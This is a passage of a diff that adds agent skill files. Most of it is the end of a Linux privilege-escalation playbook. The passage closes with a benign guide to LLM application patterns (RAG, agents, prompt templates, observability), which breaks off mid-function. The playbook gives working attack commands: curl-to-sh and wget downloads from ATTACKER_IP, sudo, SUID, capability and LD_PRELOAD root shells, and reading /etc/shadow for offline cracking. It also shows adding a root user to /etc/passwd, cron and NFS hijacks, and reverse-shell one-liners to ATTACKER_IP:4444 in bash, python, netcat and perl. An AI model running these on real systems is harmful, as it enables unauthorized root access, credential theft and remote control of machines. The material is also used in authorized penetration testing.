|
||||
|
||||
# Users with login shells
|
||||
cat /etc/passwd | grep -v nologin | grep -v false
|
||||
|
||||
# Users with home directories
|
||||
cat /etc/passwd | grep home
|
||||
|
||||
# Group memberships
|
||||
groups
|
||||
|
||||
# Other logged-in users
|
||||
w
|
||||
who
|
||||
```
|
||||
|
||||
#### Network Information
|
||||
|
||||
```bash
|
||||
# Network interfaces
|
||||
ifconfig
|
||||
ip addr
|
||||
|
||||
# Routing table
|
||||
ip route
|
||||
|
||||
# Active connections
|
||||
netstat -antup
|
||||
ss -tulpn
|
||||
|
||||
# Listening services
|
||||
netstat -l
|
||||
```
|
||||
|
||||
#### Process and Service Enumeration
|
||||
|
||||
```bash
|
||||
# All running processes
|
||||
ps aux
|
||||
ps -ef
|
||||
|
||||
# Process tree view
|
||||
ps axjf
|
||||
|
||||
# Services running as root
|
||||
ps aux | grep root
|
||||
```
|
||||
|
||||
#### Environment Variables
|
||||
|
||||
```bash
|
||||
# Full environment
|
||||
env
|
||||
|
||||
# PATH variable (for hijacking)
|
||||
echo $PATH
|
||||
```
|
||||
|
||||
### Phase 2: Automated Enumeration
|
||||
|
||||
Deploy automated scripts for comprehensive enumeration:
|
||||
|
||||
```bash
|
||||
# LinPEAS
|
||||
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
|
||||
|
||||
# LinEnum
|
||||
./LinEnum.sh -t
|
||||
|
||||
# Linux Smart Enumeration
|
||||
./lse.sh -l 1
|
||||
|
||||
# Linux Exploit Suggester
|
||||
./les.sh
|
||||
```
|
||||
|
||||
Transfer scripts to target system:
|
||||
|
||||
```bash
|
||||
# On attacker machine
|
||||
python3 -m http.server 8000
|
||||
|
||||
# On target machine
|
||||
wget http://ATTACKER_IP:8000/linpeas.sh
|
||||
chmod +x linpeas.sh
|
||||
./linpeas.sh
|
||||
```
|
||||
|
||||
### Phase 3: Kernel Exploits
|
||||
|
||||
#### Identify Kernel Version
|
||||
|
||||
```bash
|
||||
uname -r
|
||||
cat /proc/version
|
||||
```
|
||||
|
||||
#### Search for Exploits
|
||||
|
||||
```bash
|
||||
# Use Linux Exploit Suggester
|
||||
./linux-exploit-suggester.sh
|
||||
|
||||
# Manual search on exploit-db
|
||||
searchsploit linux kernel [version]
|
||||
```
|
||||
|
||||
#### Common Kernel Exploits
|
||||
|
||||
| Kernel Version | Exploit | CVE |
|
||||
|---------------|---------|-----|
|
||||
| 2.6.x - 3.x | Dirty COW | CVE-2016-5195 |
|
||||
| 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 |
|
||||
| 5.8+ | Dirty Pipe | CVE-2022-0847 |
|
||||
|
||||
#### Compile and Execute
|
||||
|
||||
```bash
|
||||
# Transfer exploit source
|
||||
wget http://ATTACKER_IP/exploit.c
|
||||
|
||||
# Compile on target
|
||||
gcc exploit.c -o exploit
|
||||
|
||||
# Execute
|
||||
./exploit
|
||||
```
|
||||
|
||||
### Phase 4: Sudo Exploitation
|
||||
|
||||
#### Enumerate Sudo Privileges
|
||||
|
||||
```bash
|
||||
sudo -l
|
||||
```
|
||||
|
||||
#### GTFOBins Sudo Exploitation
|
||||
Reference https://gtfobins.github.io for exploitation commands:
|
||||
|
||||
```bash
|
||||
# Example: vim with sudo
|
||||
sudo vim -c ':!/bin/bash'
|
||||
|
||||
# Example: find with sudo
|
||||
sudo find . -exec /bin/sh \; -quit
|
||||
|
||||
# Example: awk with sudo
|
||||
sudo awk 'BEGIN {system("/bin/bash")}'
|
||||
|
||||
# Example: python with sudo
|
||||
sudo python -c 'import os; os.system("/bin/bash")'
|
||||
|
||||
# Example: less with sudo
|
||||
sudo less /etc/passwd
|
||||
!/bin/bash
|
||||
```
|
||||
|
||||
#### LD_PRELOAD Exploitation
|
||||
When env_keep includes LD_PRELOAD:
|
||||
|
||||
```c
|
||||
// shell.c
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
void _init() {
|
||||
unsetenv("LD_PRELOAD");
|
||||
setgid(0);
|
||||
setuid(0);
|
||||
system("/bin/bash");
|
||||
}
|
||||
```
|
||||
|
||||
```bash
|
||||
# Compile shared library
|
||||
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
|
||||
|
||||
# Execute with sudo
|
||||
sudo LD_PRELOAD=/tmp/shell.so find
|
||||
```
|
||||
|
||||
### Phase 5: SUID Binary Exploitation
|
||||
|
||||
#### Find SUID Binaries
|
||||
|
||||
```bash
|
||||
find / -type f -perm -04000 -ls 2>/dev/null
|
||||
find / -perm -u=s -type f 2>/dev/null
|
||||
```
|
||||
|
||||
#### Exploit SUID Binaries
|
||||
Reference GTFOBins for SUID exploitation:
|
||||
|
||||
```bash
|
||||
# Example: base64 for file reading
|
||||
LFILE=/etc/shadow
|
||||
base64 "$LFILE" | base64 -d
|
||||
|
||||
# Example: cp for file writing
|
||||
cp /bin/bash /tmp/bash
|
||||
chmod +s /tmp/bash
|
||||
/tmp/bash -p
|
||||
|
||||
# Example: find with SUID
|
||||
find . -exec /bin/sh -p \; -quit
|
||||
```
|
||||
|
||||
#### Password Cracking via SUID
|
||||
|
||||
```bash
|
||||
# Read shadow file (if base64 has SUID)
|
||||
base64 /etc/shadow | base64 -d > shadow.txt
|
||||
base64 /etc/passwd | base64 -d > passwd.txt
|
||||
|
||||
# On attacker machine
|
||||
unshadow passwd.txt shadow.txt > hashes.txt
|
||||
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
|
||||
```
|
||||
|
||||
#### Add User to passwd (if nano/vim has SUID)
|
||||
|
||||
```bash
|
||||
# Generate password hash
|
||||
openssl passwd -1 -salt new newpassword
|
||||
|
||||
# Add to /etc/passwd (using SUID editor)
|
||||
newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
|
||||
```
|
||||
|
||||
### Phase 6: Capabilities Exploitation
|
||||
|
||||
#### Enumerate Capabilities
|
||||
|
||||
```bash
|
||||
getcap -r / 2>/dev/null
|
||||
```
|
||||
|
||||
#### Exploit Capabilities
|
||||
|
||||
```bash
|
||||
# Example: python with cap_setuid
|
||||
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
|
||||
|
||||
# Example: vim with cap_setuid
|
||||
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")'
|
||||
|
||||
# Example: perl with cap_setuid
|
||||
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
|
||||
```
|
||||
|
||||
### Phase 7: Cron Job Exploitation
|
||||
|
||||
#### Enumerate Cron Jobs
|
||||
|
||||
```bash
|
||||
# System crontab
|
||||
cat /etc/crontab
|
||||
|
||||
# User crontabs
|
||||
ls -la /var/spool/cron/crontabs/
|
||||
|
||||
# Cron directories
|
||||
ls -la /etc/cron.*
|
||||
|
||||
# Systemd timers
|
||||
systemctl list-timers
|
||||
```
|
||||
|
||||
#### Exploit Writable Cron Scripts
|
||||
|
||||
```bash
|
||||
# Identify writable cron script from /etc/crontab
|
||||
ls -la /opt/backup.sh # Check permissions
|
||||
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh
|
||||
|
||||
# If cron references non-existent script in writable PATH
|
||||
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh
|
||||
chmod +x /home/user/antivirus.sh
|
||||
```
|
||||
|
||||
### Phase 8: PATH Hijacking
|
||||
|
||||
```bash
|
||||
# Find SUID binary calling external command
|
||||
strings /usr/local/bin/suid-binary
|
||||
# Shows: system("service apache2 start")
|
||||
|
||||
# Hijack by creating malicious binary in writable PATH
|
||||
export PATH=/tmp:$PATH
|
||||
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
|
||||
chmod +x /tmp/service
|
||||
/usr/local/bin/suid-binary # Execute SUID binary
|
||||
```
|
||||
|
||||
### Phase 9: NFS Exploitation
|
||||
|
||||
```bash
|
||||
# On target - look for no_root_squash option
|
||||
cat /etc/exports
|
||||
|
||||
# On attacker - mount share and create SUID binary
|
||||
showmount -e TARGET_IP
|
||||
mount -o rw TARGET_IP:/share /tmp/nfs
|
||||
|
||||
# Create and compile SUID shell
|
||||
echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
|
||||
gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell
|
||||
|
||||
# On target - execute
|
||||
/share/shell
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Enumeration Commands Summary
|
||||
| Purpose | Command |
|
||||
|---------|---------|
|
||||
| Kernel version | `uname -a` |
|
||||
| Current user | `id` |
|
||||
| Sudo rights | `sudo -l` |
|
||||
| SUID files | `find / -perm -u=s -type f 2>/dev/null` |
|
||||
| Capabilities | `getcap -r / 2>/dev/null` |
|
||||
| Cron jobs | `cat /etc/crontab` |
|
||||
| Writable dirs | `find / -writable -type d 2>/dev/null` |
|
||||
| NFS exports | `cat /etc/exports` |
|
||||
|
||||
### Reverse Shell One-Liners
|
||||
```bash
|
||||
# Bash
|
||||
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
|
||||
|
||||
# Python
|
||||
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
|
||||
|
||||
# Netcat
|
||||
nc -e /bin/bash ATTACKER_IP 4444
|
||||
|
||||
# Perl
|
||||
perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'
|
||||
```
|
||||
|
||||
### Key Resources
|
||||
- GTFOBins: https://gtfobins.github.io
|
||||
- LinPEAS: https://github.com/carlospolop/PEASS-ng
|
||||
- Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester
|
||||
|
||||
## Constraints and Guardrails
|
||||
|
||||
### Operational Boundaries
|
||||
- Verify kernel exploits in test environment before production use
|
||||
- Failed kernel exploits may crash the system
|
||||
- Document all changes made during privilege escalation
|
||||
- Maintain access persistence only as authorized
|
||||
|
||||
### Technical Limitations
|
||||
- Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)
|
||||
- AppArmor/SELinux may restrict exploitation techniques
|
||||
- Container environments limit kernel-level exploits
|
||||
- Hardened systems may have restricted sudo configurations
|
||||
|
||||
### Legal and Ethical Requirements
|
||||
- Written authorization required before testing
|
||||
- Stay within defined scope boundaries
|
||||
- Report critical findings immediately
|
||||
- Do not access data beyond scope requirements
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Sudo to Root via find
|
||||
|
||||
**Scenario**: User has sudo rights for find command
|
||||
|
||||
```bash
|
||||
$ sudo -l
|
||||
User user may run the following commands:
|
||||
(root) NOPASSWD: /usr/bin/find
|
||||
|
||||
$ sudo find . -exec /bin/bash \; -quit
|
||||
# id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
||||
|
||||
### Example 2: SUID base64 for Shadow Access
|
||||
|
||||
**Scenario**: base64 binary has SUID bit set
|
||||
|
||||
```bash
|
||||
$ find / -perm -u=s -type f 2>/dev/null | grep base64
|
||||
/usr/bin/base64
|
||||
|
||||
$ base64 /etc/shadow | base64 -d
|
||||
root:$6$xyz...:18000:0:99999:7:::
|
||||
|
||||
# Crack offline with john
|
||||
$ john --wordlist=rockyou.txt shadow.txt
|
||||
```
|
||||
|
||||
### Example 3: Cron Job Script Hijacking
|
||||
|
||||
**Scenario**: Root cron job executes writable script
|
||||
|
||||
```bash
|
||||
$ cat /etc/crontab
|
||||
* * * * * root /opt/scripts/backup.sh
|
||||
|
||||
$ ls -la /opt/scripts/backup.sh
|
||||
-rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh
|
||||
|
||||
$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh
|
||||
|
||||
# Wait 1 minute
|
||||
$ /tmp/bash -p
|
||||
# id
|
||||
uid=1000(user) gid=1000(user) euid=0(root)
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solutions |
|
||||
|-------|-----------|
|
||||
| Exploit compilation fails | Check for gcc: `which gcc`; compile on attacker for same arch; use `gcc -static` |
|
||||
| Reverse shell not connecting | Check firewall; try ports 443/80; use staged payloads; check egress filtering |
|
||||
| SUID binary not exploitable | Verify version matches GTFOBins; check AppArmor/SELinux; some binaries drop privileges |
|
||||
| Cron job not executing | Verify cron running: `service cron status`; check +x permissions; verify PATH in crontab |
|
||||
760
skills/llm-app-patterns/SKILL.md
Normal file
760
skills/llm-app-patterns/SKILL.md
Normal file
@@ -0,0 +1,760 @@
|
||||
---
|
||||
name: llm-app-patterns
|
||||
description: "Production-ready patterns for building LLM applications. Covers RAG pipelines, agent architectures, prompt IDEs, and LLMOps monitoring. Use when designing AI applications, implementing RAG, building agents, or setting up LLM observability."
|
||||
---
|
||||
|
||||
# 🤖 LLM Application Patterns
|
||||
|
||||
> Production-ready patterns for building LLM applications, inspired by [Dify](https://github.com/langgenius/dify) and industry best practices.
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
Use this skill when:
|
||||
|
||||
- Designing LLM-powered applications
|
||||
- Implementing RAG (Retrieval-Augmented Generation)
|
||||
- Building AI agents with tools
|
||||
- Setting up LLMOps monitoring
|
||||
- Choosing between agent architectures
|
||||
|
||||
---
|
||||
|
||||
## 1. RAG Pipeline Architecture
|
||||
|
||||
### Overview
|
||||
|
||||
RAG (Retrieval-Augmented Generation) grounds LLM responses in your data.
|
||||
|
||||
```
|
||||
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
|
||||
│ Ingest │────▶│ Retrieve │────▶│ Generate │
|
||||
│ Documents │ │ Context │ │ Response │
|
||||
└─────────────┘ └─────────────┘ └─────────────┘
|
||||
│ │ │
|
||||
▼ ▼ ▼
|
||||
┌─────────┐ ┌───────────┐ ┌───────────┐
|
||||
│ Chunking│ │ Vector │ │ LLM │
|
||||
│Embedding│ │ Search │ │ + Context│
|
||||
└─────────┘ └───────────┘ └───────────┘
|
||||
```
|
||||
|
||||
### 1.1 Document Ingestion
|
||||
|
||||
```python
|
||||
# Chunking strategies
|
||||
class ChunkingStrategy:
|
||||
# Fixed-size chunks (simple but may break context)
|
||||
FIXED_SIZE = "fixed_size" # e.g., 512 tokens
|
||||
|
||||
# Semantic chunking (preserves meaning)
|
||||
SEMANTIC = "semantic" # Split on paragraphs/sections
|
||||
|
||||
# Recursive splitting (tries multiple separators)
|
||||
RECURSIVE = "recursive" # ["\n\n", "\n", " ", ""]
|
||||
|
||||
# Document-aware (respects structure)
|
||||
DOCUMENT_AWARE = "document_aware" # Headers, lists, etc.
|
||||
|
||||
# Recommended settings
|
||||
CHUNK_CONFIG = {
|
||||
"chunk_size": 512, # tokens
|
||||
"chunk_overlap": 50, # token overlap between chunks
|
||||
"separators": ["\n\n", "\n", ". ", " "],
|
||||
}
|
||||
```
|
||||
|
||||
### 1.2 Embedding & Storage
|
||||
|
||||
```python
|
||||
# Vector database selection
|
||||
VECTOR_DB_OPTIONS = {
|
||||
"pinecone": {
|
||||
"use_case": "Production, managed service",
|
||||
"scale": "Billions of vectors",
|
||||
"features": ["Hybrid search", "Metadata filtering"]
|
||||
},
|
||||
"weaviate": {
|
||||
"use_case": "Self-hosted, multi-modal",
|
||||
"scale": "Millions of vectors",
|
||||
"features": ["GraphQL API", "Modules"]
|
||||
},
|
||||
"chromadb": {
|
||||
"use_case": "Development, prototyping",
|
||||
"scale": "Thousands of vectors",
|
||||
"features": ["Simple API", "In-memory option"]
|
||||
},
|
||||
"pgvector": {
|
||||
"use_case": "Existing Postgres infrastructure",
|
||||
"scale": "Millions of vectors",
|
||||
"features": ["SQL integration", "ACID compliance"]
|
||||
}
|
||||
}
|
||||
|
||||
# Embedding model selection
|
||||
EMBEDDING_MODELS = {
|
||||
"openai/text-embedding-3-small": {
|
||||
"dimensions": 1536,
|
||||
"cost": "$0.02/1M tokens",
|
||||
"quality": "Good for most use cases"
|
||||
},
|
||||
"openai/text-embedding-3-large": {
|
||||
"dimensions": 3072,
|
||||
"cost": "$0.13/1M tokens",
|
||||
"quality": "Best for complex queries"
|
||||
},
|
||||
"local/bge-large": {
|
||||
"dimensions": 1024,
|
||||
"cost": "Free (compute only)",
|
||||
"quality": "Comparable to OpenAI small"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 1.3 Retrieval Strategies
|
||||
|
||||
```python
|
||||
# Basic semantic search
|
||||
def semantic_search(query: str, top_k: int = 5):
|
||||
query_embedding = embed(query)
|
||||
results = vector_db.similarity_search(
|
||||
query_embedding,
|
||||
top_k=top_k
|
||||
)
|
||||
return results
|
||||
|
||||
# Hybrid search (semantic + keyword)
|
||||
def hybrid_search(query: str, top_k: int = 5, alpha: float = 0.5):
|
||||
"""
|
||||
alpha=1.0: Pure semantic
|
||||
alpha=0.0: Pure keyword (BM25)
|
||||
alpha=0.5: Balanced
|
||||
"""
|
||||
semantic_results = vector_db.similarity_search(query)
|
||||
keyword_results = bm25_search(query)
|
||||
|
||||
# Reciprocal Rank Fusion
|
||||
return rrf_merge(semantic_results, keyword_results, alpha)
|
||||
|
||||
# Multi-query retrieval
|
||||
def multi_query_retrieval(query: str):
|
||||
"""Generate multiple query variations for better recall"""
|
||||
queries = llm.generate_query_variations(query, n=3)
|
||||
all_results = []
|
||||
for q in queries:
|
||||
all_results.extend(semantic_search(q))
|
||||
return deduplicate(all_results)
|
||||
|
||||
# Contextual compression
|
||||
def compressed_retrieval(query: str):
|
||||
"""Retrieve then compress to relevant parts only"""
|
||||
docs = semantic_search(query, top_k=10)
|
||||
compressed = llm.extract_relevant_parts(docs, query)
|
||||
return compressed
|
||||
```
|
||||
|
||||
### 1.4 Generation with Context
|
||||
|
||||
```python
|
||||
RAG_PROMPT_TEMPLATE = """
|
||||
Answer the user's question based ONLY on the following context.
|
||||
If the context doesn't contain enough information, say "I don't have enough information to answer that."
|
||||
|
||||
Context:
|
||||
{context}
|
||||
|
||||
Question: {question}
|
||||
|
||||
Answer:"""
|
||||
|
||||
def generate_with_rag(question: str):
|
||||
# Retrieve
|
||||
context_docs = hybrid_search(question, top_k=5)
|
||||
context = "\n\n".join([doc.content for doc in context_docs])
|
||||
|
||||
# Generate
|
||||
prompt = RAG_PROMPT_TEMPLATE.format(
|
||||
context=context,
|
||||
question=question
|
||||
)
|
||||
|
||||
response = llm.generate(prompt)
|
||||
|
||||
# Return with citations
|
||||
return {
|
||||
"answer": response,
|
||||
"sources": [doc.metadata for doc in context_docs]
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 2. Agent Architectures
|
||||
|
||||
### 2.1 ReAct Pattern (Reasoning + Acting)
|
||||
|
||||
```
|
||||
Thought: I need to search for information about X
|
||||
Action: search("X")
|
||||
Observation: [search results]
|
||||
Thought: Based on the results, I should...
|
||||
Action: calculate(...)
|
||||
Observation: [calculation result]
|
||||
Thought: I now have enough information
|
||||
Action: final_answer("The answer is...")
|
||||
```
|
||||
|
||||
```python
|
||||
REACT_PROMPT = """
|
||||
You are an AI assistant that can use tools to answer questions.
|
||||
|
||||
Available tools:
|
||||
{tools_description}
|
||||
|
||||
Use this format:
|
||||
Thought: [your reasoning about what to do next]
|
||||
Action: [tool_name(arguments)]
|
||||
Observation: [tool result - this will be filled in]
|
||||
... (repeat Thought/Action/Observation as needed)
|
||||
Thought: I have enough information to answer
|
||||
Final Answer: [your final response]
|
||||
|
||||
Question: {question}
|
||||
"""
|
||||
|
||||
class ReActAgent:
|
||||
def __init__(self, tools: list, llm):
|
||||
self.tools = {t.name: t for t in tools}
|
||||
self.llm = llm
|
||||
self.max_iterations = 10
|
||||
|
||||
def run(self, question: str) -> str:
|
||||
prompt = REACT_PROMPT.format(
|
||||
tools_description=self._format_tools(),
|
||||
question=question
|
||||
)
|
||||
|
||||
for _ in range(self.max_iterations):
|
||||
response = self.llm.generate(prompt)
|
||||
|
||||
if "Final Answer:" in response:
|
||||
return self._extract_final_answer(response)
|
||||
|
||||
action = self._parse_action(response)
|
||||
observation = self._execute_tool(action)
|
||||
prompt += f"\nObservation: {observation}\n"
|
||||
|
||||
return "Max iterations reached"
|
||||
```
|
||||
|
||||
### 2.2 Function Calling Pattern
|
||||
|
||||
```python
|
||||
# Define tools as functions with schemas
|
||||
TOOLS = [
|
||||
{
|
||||
"name": "search_web",
|
||||
"description": "Search the web for current information",
|
||||
"parameters": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"query": {
|
||||
"type": "string",
|
||||
"description": "Search query"
|
||||
}
|
||||
},
|
||||
"required": ["query"]
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "calculate",
|
||||
"description": "Perform mathematical calculations",
|
||||
"parameters": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"expression": {
|
||||
"type": "string",
|
||||
"description": "Math expression to evaluate"
|
||||
}
|
||||
},
|
||||
"required": ["expression"]
|
||||
}
|
||||
}
|
||||
]
|
||||
|
||||
class FunctionCallingAgent:
|
||||
def run(self, question: str) -> str:
|
||||
messages = [{"role": "user", "content": question}]
|
||||
|
||||
while True:
|
||||
response = self.llm.chat(
|
||||
messages=messages,
|
||||
tools=TOOLS,
|
||||
tool_choice="auto"
|
||||
)
|
||||
|
||||
if response.tool_calls:
|
||||
for tool_call in response.tool_calls:
|
||||
result = self._execute_tool(
|
||||
tool_call.name,
|
||||
tool_call.arguments
|
||||
)
|
||||
messages.append({
|
||||
"role": "tool",
|
||||
"tool_call_id": tool_call.id,
|
||||
"content": str(result)
|
||||
})
|
||||
else:
|
||||
return response.content
|
||||
```
|
||||
|
||||
### 2.3 Plan-and-Execute Pattern
|
||||
|
||||
```python
|
||||
class PlanAndExecuteAgent:
|
||||
"""
|
||||
1. Create a plan (list of steps)
|
||||
2. Execute each step
|
||||
3. Replan if needed
|
||||
"""
|
||||
|
||||
def run(self, task: str) -> str:
|
||||
# Planning phase
|
||||
plan = self.planner.create_plan(task)
|
||||
# Returns: ["Step 1: ...", "Step 2: ...", ...]
|
||||
|
||||
results = []
|
||||
for step in plan:
|
||||
# Execute each step
|
||||
result = self.executor.execute(step, context=results)
|
||||
results.append(result)
|
||||
|
||||
# Check if replan needed
|
||||
if self._needs_replan(task, results):
|
||||
new_plan = self.planner.replan(
|
||||
task,
|
||||
completed=results,
|
||||
remaining=plan[len(results):]
|
||||
)
|
||||
plan = new_plan
|
||||
|
||||
# Synthesize final answer
|
||||
return self.synthesizer.summarize(task, results)
|
||||
```
|
||||
|
||||
### 2.4 Multi-Agent Collaboration
|
||||
|
||||
```python
|
||||
class AgentTeam:
|
||||
"""
|
||||
Specialized agents collaborating on complex tasks
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.agents = {
|
||||
"researcher": ResearchAgent(),
|
||||
"analyst": AnalystAgent(),
|
||||
"writer": WriterAgent(),
|
||||
"critic": CriticAgent()
|
||||
}
|
||||
self.coordinator = CoordinatorAgent()
|
||||
|
||||
def solve(self, task: str) -> str:
|
||||
# Coordinator assigns subtasks
|
||||
assignments = self.coordinator.decompose(task)
|
||||
|
||||
results = {}
|
||||
for assignment in assignments:
|
||||
agent = self.agents[assignment.agent]
|
||||
result = agent.execute(
|
||||
assignment.subtask,
|
||||
context=results
|
||||
)
|
||||
results[assignment.id] = result
|
||||
|
||||
# Critic reviews
|
||||
critique = self.agents["critic"].review(results)
|
||||
|
||||
if critique.needs_revision:
|
||||
# Iterate with feedback
|
||||
return self.solve_with_feedback(task, results, critique)
|
||||
|
||||
return self.coordinator.synthesize(results)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Prompt IDE Patterns
|
||||
|
||||
### 3.1 Prompt Templates with Variables
|
||||
|
||||
```python
|
||||
class PromptTemplate:
|
||||
def __init__(self, template: str, variables: list[str]):
|
||||
self.template = template
|
||||
self.variables = variables
|
||||
|
||||
def format(self, **kwargs) -> str:
|
||||
# Validate all variables provided
|
||||
missing = set(self.variables) - set(kwargs.keys())
|
||||
if missing:
|
||||
raise ValueError(f"Missing variables: {missing}")
|
||||
|
||||
return self.template.format(**kwargs)
|
||||
|
||||
def with_examples(self, examples: list[dict]) -> str:
|
||||
"""Add few-shot examples"""
|
||||
example_text = "\n\n".join([
|
||||
f"Input: {ex['input']}\nOutput: {ex['output']}"
|
||||
for ex in examples
|
||||
])
|
||||
return f"{example_text}\n\n{self.template}"
|
||||
|
||||
# Usage
|
||||
summarizer = PromptTemplate(
|
||||
template="Summarize the following text in {style} style:\n\n{text}",
|
||||
variables=["style", "text"]
|
||||
)
|
||||
|
||||
prompt = summarizer.format(
|
||||
style="professional",
|
||||
text="Long article content..."
|
||||
)
|
||||
```
|
||||
|
||||
### 3.2 Prompt Versioning & A/B Testing
|
||||
|
||||
```python
|
||||
class PromptRegistry:
|
||||
def __init__(self, db):
|
||||
self.db = db
|
||||
|
||||
def register(self, name: str, template: str, version: str):
|
||||
"""Store prompt with version"""
|
||||
self.db.save({
|
||||
"name": name,
|
||||
"template": template,
|
||||
"version": version,
|
||||
"created_at": datetime.now(),
|
||||
"metrics": {}
|
||||
})
|
||||
|
||||
def get(self, name: str, version: str = "latest") -> str:
|
||||
"""Retrieve specific version"""
|
||||
return self.db.get(name, version)
|
||||
|
||||
def ab_test(self, name: str, user_id: str) -> str:
|
||||
"""Return variant based on user bucket"""
|
||||
variants = self.db.get_all_versions(name)
|
||||
bucket = hash(user_id) % len(variants)
|
||||
return variants[bucket]
|
||||
|
||||
def record_outcome(self, prompt_id: str, outcome: dict):
|
||||
"""Track prompt performance"""
|
||||
self.db.update_metrics(prompt_id, outcome)
|
||||
```
|
||||
|
||||
### 3.3 Prompt Chaining
|
||||
|
||||
```python
|
||||
class PromptChain:
|
||||
"""
|
||||
Chain prompts together, passing output as input to next
|
||||
"""
|
||||
|
||||
def __init__(self, steps: list[dict]):
|
||||
self.steps = steps
|
||||
|
||||
def run(self, initial_input: str) -> dict:
|
||||
context = {"input": initial_input}
|
||||
results = []
|
||||
|
||||
for step in self.steps:
|
||||
prompt = step["prompt"].format(**context)
|
||||
output = llm.generate(prompt)
|
||||
|
||||
# Parse output if needed
|
||||
if step.get("parser"):
|
||||
output = step["parser"](output)
|
||||
|
||||
context[step["output_key"]] = output
|
||||
results.append({
|
||||
"step": step["name"],
|
||||
"output": output
|
||||
})
|
||||
|
||||
return {
|
||||
"final_output": context[self.steps[-1]["output_key"]],
|
||||
"intermediate_results": results
|
||||
}
|
||||
|
||||
# Example: Research → Analyze → Summarize
|
||||
chain = PromptChain([
|
||||
{
|
||||
"name": "research",
|
||||
"prompt": "Research the topic: {input}",
|
||||
"output_key": "research"
|
||||
},
|
||||
{
|
||||
"name": "analyze",
|
||||
"prompt": "Analyze these findings:\n{research}",
|
||||
"output_key": "analysis"
|
||||
},
|
||||
{
|
||||
"name": "summarize",
|
||||
"prompt": "Summarize this analysis in 3 bullet points:\n{analysis}",
|
||||
"output_key": "summary"
|
||||
}
|
||||
])
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. LLMOps & Observability
|
||||
|
||||
### 4.1 Metrics to Track
|
||||
|
||||
```python
|
||||
LLM_METRICS = {
|
||||
# Performance
|
||||
"latency_p50": "50th percentile response time",
|
||||
"latency_p99": "99th percentile response time",
|
||||
"tokens_per_second": "Generation speed",
|
||||
|
||||
# Quality
|
||||
"user_satisfaction": "Thumbs up/down ratio",
|
||||
"task_completion": "% tasks completed successfully",
|
||||
"hallucination_rate": "% responses with factual errors",
|
||||
|
||||
# Cost
|
||||
"cost_per_request": "Average $ per API call",
|
||||
"tokens_per_request": "Average tokens used",
|
||||
"cache_hit_rate": "% requests served from cache",
|
||||
|
||||
# Reliability
|
||||
"error_rate": "% failed requests",
|
||||
"timeout_rate": "% requests that timed out",
|
||||
"retry_rate": "% requests needing retry"
|
||||
}
|
||||
```
|
||||
|
||||
### 4.2 Logging & Tracing
|
||||
|
||||
```python
|
||||
import logging
|
||||
from opentelemetry import trace
|
||||
|
||||
tracer = trace.get_tracer(__name__)
|
||||
|
||||
class LLMLogger:
|
||||
def log_request(self, request_id: str, data: dict):
|
||||
"""Log LLM request for debugging and analysis"""
|
||||
log_entry = {
|
||||
"request_id": request_id,
|
||||
"timestamp": datetime.now().isoformat(),
|
||||
"model": data["model"],
|
||||
"prompt": data["prompt"][:500], # Truncate for storage
|
||||
"prompt_tokens": data["prompt_tokens"],
|
||||
"temperature": data.get("temperature", 1.0),
|
||||
"user_id": data.get("user_id"),
|
||||
}
|
||||
logging.info(f"LLM_REQUEST: {json.dumps(log_entry)}")
|
||||
|
||||
def log_response(self, request_id: str, data: dict):
|
||||
"""Log LLM response"""
|
||||
log_entry = {
|
||||
"request_id": request_id,
|
||||
"completion_tokens": data["completion_tokens"],
|
||||
"total_tokens": data["total_tokens"],
|
||||
"latency_ms": data["latency_ms"],
|
||||
"finish_reason": data["finish_reason"],
|
||||
"cost_usd": self._calculate_cost(data),
|
||||
}
|
||||
logging.info(f"LLM_RESPONSE: {json.dumps(log_entry)}")
|
||||
|
||||
# Distributed tracing
|
||||
@tracer.start_as_current_span("llm_call")
|
||||
def call_llm(prompt: str) -> str:
|
||||
span = trace.get_current_span()
|
||||
span.set_attribute("prompt.length", len(prompt))
|
||||
|
||||
response = llm.generate(prompt)
|
||||
|
||||
